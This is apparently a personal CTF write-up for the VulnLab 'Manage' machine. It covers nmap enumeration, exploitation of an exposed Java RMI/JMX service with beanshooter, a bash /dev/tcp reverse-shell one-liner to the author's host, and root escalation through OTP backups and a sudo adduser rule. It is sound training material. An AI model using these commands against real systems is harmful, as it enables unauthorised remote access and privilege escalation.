Try   HackMD

VULNLAB-MANAGE: WRITEUP

Difficulty: Easy

Description

Manage is a easy-linux machine from vulnlab, created by xct. with interested feature which can be obtained from enumeration.

SCANNING

# Nmap 7.94SVN scan initiated Wed Oct 16 13:05:52 2024 as: /usr/lib/nmap/nmap --privileged -vvv -p 22,2222,8080 -sC -sV -oN nmap.txt -vvv 10.10.104.58 10.10.115.208
Nmap scan report for 10.10.115.208 [host down, received no-response]
Nmap scan report for manage.vl (10.10.104.58)
Host is up, received echo-reply ttl 63 (0.28s latency).
Scanned at 2024-10-16 13:05:56 EDT for 60s

PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a9:36:3d:1d:43:62:bd:b3:88:5e:37:b1:fa:bb:87:64 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBL/6LNCGTwX42XmhwON6uF7gkwKfdO4iIzYnFD87dWpXiPrNIYgfW0953r40u4j4DAf+PhgdmdKKKE8KIifQaVc=
|   256 da:3b:11:08:81:43:2f:4c:25:42:ae:9b:7f:8c:57:98 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGbGFCw+4cyYAXrdHnPXp2K1ojZhTcQrXPI+pDFW5vkh
2222/tcp open  java-rmi syn-ack ttl 63 Java RMI
| rmi-dumpregistry: 
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @127.0.1.1:42783
|     extends
|       java.rmi.server.RemoteStub
|       extends
|_        java.rmi.server.RemoteObject
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
8080/tcp open  http     syn-ack ttl 63 Apache Tomcat 10.1.19
| http-methods: 
|_  Supported Methods: POST OPTIONS
|_http-favicon: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 16 13:06:56 2024 -- 2 IP addresses (1 host up) scanned in 64.93 seconds

From nmap scanning we can see that our target has 3 open ports i.e

  1. 22
  2. 8080
  3. 2222
  • With port 22 we can't login with ssh because we have no valid creds, so we can try to enumerate other ports.

ENUM & ENUM & ENUM

port 8080

From port 8080 we can see apache tomcat is running, with this we now know what type of language was used here i.e java. lets keep enumerating

Screenshot from 2024-10-16 15-36-04

  • While enumerating i left gobuster,ffuf, and dirsearch run at the background while i can continue with other port, but nothing of interest i found.

port 2222

2222/tcp open  java-rmi syn-ack ttl 63 Java RMI
| rmi-dumpregistry: 
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @127.0.1.1:42783
|     extends
|       java.rmi.server.RemoteStub
|       extends
|_        java.rmi.server.RemoteObject
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
  • port 2222 was very interesting, we can see java-rmi is running, when i was doing this lab i was't aware of java-rmi so i had to google and understand what it is and what it info it can offer me.

On my way moving there is this documentation which explains alot about java-rmi

Screenshot from 2024-10-16 15-41-56

The easiest way to detect this is by using different tools but most nmap also can enumerate this service and identify it. other tool are like remote-method-guesser(rmg),BaRMIe
and beanshooter

Screenshot from 2024-10-16 15-44-58

Now after reading alot of documentation here and there i found that we can use this tools to scan for vulnerability but also others tools like beanshooter can even give remote code execution.

EXPLOITATION

If a Java Remote Method Invocation (RMI) service is poorly configured, it becomes vulnerable to various Remote Code Execution (RCE) methods. One method involves hosting an MLet file and directing the JMX service to load MBeans from a distant server, achievable using tools like mjet or sjet. The remote-method-guesser tool is newer and combines RMI service enumeration with an overview of recognized attack strategies.

RCE using beanshooter

i found it easy to enumerate and exploit it RMI with beanshooter. There is this repo explain well on how to configure beanshooter beanshooter.

➜ MANAGE java -jar beanshooter-4.1.0-jar-with-dependencies.jar info 10.10.104.58 2222

Screenshot from 2024-10-16 15-59-15

  • info - display method and attribute information on an MBean

we can get more info with enum

  • enum enumerate the JMX service for common vulnerabilities
    Screenshot from 2024-10-16 16-07-39

Some interested output,remote Mbean server is vulnerable, but at the bottom we can find some creds of two users manager and admin

[+] Enumerating tomcat users:
[+]
[+]     - Listing 2 tomcat users:
[+]
[+]             ----------------------------------------
[+]             Username:  manager
[+]             Password:  <REDACTED>
[+]             Roles:
[+]                        Users:type=Role,rolename="manage-gui",database=UserDatabase
[+]
[+]             ----------------------------------------
[+]             Username:  admin
[+]             Password:  <REDACTED>
[+]             Roles:
[+]                        Users:type=Role,rolename="role1",database=UserDatabase

From here still this creds don't work with ssh so we need to get a shell, after reading again the help menu from beanshooter found something interesting.

Screenshot from 2024-10-16 16-12-53

At the bottom we can see that we can use tonka for uploading and executing commands this was interesting for me, i decided to use it to get a shell.

➜  MANAGE java -jar beanshooter-4.1.0-jar-with-dependencies.jar tonka shell 10.10.104.58 2222

Screenshot from 2024-10-16 16-16-11

The shell was not stable, it has some delays so we can try to forward a shell into out machine i.e

/bin/bash -c 'bash -i &>/dev/tcp/10.8.3.117/1234 <&1'

Screenshot from 2024-10-16 16-19-15

  • user.txt = /opt/tomcat
    Screenshot from 2024-10-16 16-21-27

PRIVILEGE ESCALATION

from /etc/passwd

From /etc/passwd we can see that we have got three users(root,useradmin and karl) with shell. The other two users(kamui and admin) you can ignore them, This were the user i added while i was solving the lab,so they are not part of the lab.

  • user admin is not accessible without creds which means that we can we need valid creds to be admin.
tomcat@manage:/home$ cd admin
cd admin
bash: cd: admin: Permission denied
tomcat@manage:/home$

backup file

Inside user useradmin without creds we can access the backup archive, so i decided to transfer this into my machine and check what inside it.

image

Inside the archive file we can see some interesting file such as .google_authonticator

Screenshot from 2024-10-16 16-32-59

And if we try to check its content we see something like this, we have OTP but still so far we don't know where to use it.

Screenshot from 2024-10-16 16-34-22

shell as useradmin

Previous we had something like admin password we can try to use it go get a shell. i.e

Screenshot from 2024-10-16 16-43-38

Now we know where the OTP was supposed to be used,lets use one of the OTP, something to note is that once the OTP is used you can't use it again so take another one.

shell as root

Using basics sudo enumeration such as sudo -l, we can see that what a normal user can run as root

Screenshot from 2024-10-16 16-44-48

with sudo /usr/sbin/adduser ^[a-zA-Z0-9]+$ When a new user is created in the system, a group with the same name is automatically created. Therefore, if we add a user named 'admin', a group named 'admin' will be created and the user 'admin' will be added to that group automatically.I decide to add user admin.

sudo /usr/sbin/adduser admin

Screenshot from 2024-10-16 16-57-33

Now if we try to run again sudo -l , Lets now try to switch to user admin.

Screenshot from 2024-10-16 16-59-05

  • And finally we got root access.
    Screenshot from 2024-10-16 17-01-14
Last changed by 
alienX
security analyst ,penetration tester,red teamer, CTF player
0
124

Read more

PUBLIC-KEY CRYPTOGRAPHY

These challenges first introduce us to the many footguns of RSA, and soon see you performing attacks which real software has been vulnerable to. Next, we will look at Diffie-Hellman key exchange and explore how the core problem behind it, and later on we will see how we can use the power of programming language to solve attacks such as Man-In-The-Middle attacks by intercepting and crack the secret messages

Mar 28, 2025
OVERVIEW

Hellow forks its alienkeric again from this side before the 2024 ended I had some goals to accomplish which were one ex

Jan 14, 2025
SEA-WRITEUP

Hello forks, lets wanted to share with season-6 machine from hackthebox,

Dec 21, 2024
PRINTER EXPLOITATION FROM HTB

Hello hackers am back again with printer exploitation, actually today i thought maybe I can share with you guys about printer hacking dispite i haven&#39;t write any post coz school is becoming really hot men and at the same time it sucks for sure. I was interested to see how printers are being hacked after listerning to one of the podcast from darknet diaries from my spofity, and after moving around with HTB tracks I found a track which deals with printer hacking and i was interested to see how i can hack the printer, lets get started.

Oct 8, 2024
Read more from alienX
Published on HackMD